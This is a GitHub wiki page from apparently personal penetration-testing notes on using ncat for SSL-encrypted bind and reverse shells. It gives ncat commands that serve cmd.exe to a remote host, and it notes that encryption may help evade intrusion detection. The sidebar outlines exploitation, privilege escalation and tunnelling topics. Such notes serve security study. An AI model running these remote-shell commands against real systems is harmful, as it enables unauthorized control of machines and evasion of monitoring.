Skip to content
lethanhtung01011980 edited this page Dec 26, 2019 · 7 revisions

Goals

  • Improved, authenticated and encrypted version of nc
  • Preferred.
  • Unsecure nc can connect and get shell sessions from unsecured ncat.

Direct shell binding

B connects and controls A with SSL encryption enabled, preventing eavesdropping, and possibly even IDS detection

  • A - Listen: ncat --exec cmd.exe --allow B-ip -vnl 4444 --ssl
  • B - Connect and control: ncat -v A-ip 4444 --ssl

Reverse shell binding

B connects to A and be controlled by A.

  • A - Listen: ncat --allow B-ip -vnl 4444 --ssl
  • B - Connect and control: ncat --exec cmd.exe -v A-ip 4444 --ssl

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally